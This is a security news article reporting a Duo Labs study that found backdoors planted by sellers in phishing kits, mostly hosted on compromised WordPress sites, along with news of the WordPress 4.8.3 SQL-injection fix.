A study of 3,200 unique phishing kits has found that 200 of the kits contained a backdoor, allowing the seller to claim compromised websites without doing the leg work.
The study, by Jordan Wright, a researcher at two-factor authentication firm Duo Labs, looked at 3,200 unique phishing kits that were found after scanning 66,000 suspected phishing URLs.
Phishing kits have been around for a few years, offering a package of tools for reusing across multiple phishing campaigns, such as fake login pages for PayPal, Office 365, banking sites and so on, multi-language support, methods for validating credentials that victims enter, and redirects to the real page.
As noted by Wright, the kits, which are often bundled in .zip files, are usually uploaded to a host that’s been comprised through a CMS vulnerability, which is used to send phishing emails with links to a new phishing site. Captured credentials are often emailed to the attacker.
Interestingly, but not surprisingly, Wright found that phishing kit vendors frequently free-ride off customers by hiding backdoors in the kits. One particular backdoor was found in 200 phishing kits.
“This shows that attackers who are selling or distributing these phishing kits to other criminals are actively backdooring them to give themselves access to the compromised hosts. Clearly there's no honor among thieves,” wrote Wright.
Wright’s paper offers a look at how to do large scale research on phishing kits. He found that many phishing attackers simply leave the .zip files, allowing anyone to download the kit and analyze it, including what it’s collected and where it’s sent. The 3,200 kits were found after sifting through 66,000 URLs that had been submitted to crowdsourced phishing URL feeds Phishtank and OpenPhish over a month.
The study looked at tactics phishing kit users use to remain on a compromised server, which included blocking IP ranges for popular threat intelligence services, such as Netcraft, Sophos, abuse.ch, Fortinet and Kaspersky.
The research found that most phishing kits were hosted on WordPress sites that likely were compromised. Though this doesn’t necessarily reflect poorly on WordPress, which is by far the most popular CMS in use, followed by others like Magento.
However, to avoid harming visitors, WordPress users will need to update apply another update as soon as possible. WordPress developers released WordPress 4.8.3 today, which contains a security fix for an SQL-injection flaw found by engineer Anthony Ferrara.
He detailed his six week ordeal in getting WordPress volunteer developers to fix the problem, which was initially brushed off as a non-security issue. He’s also posted advice on what site owners should do to remediate the problem.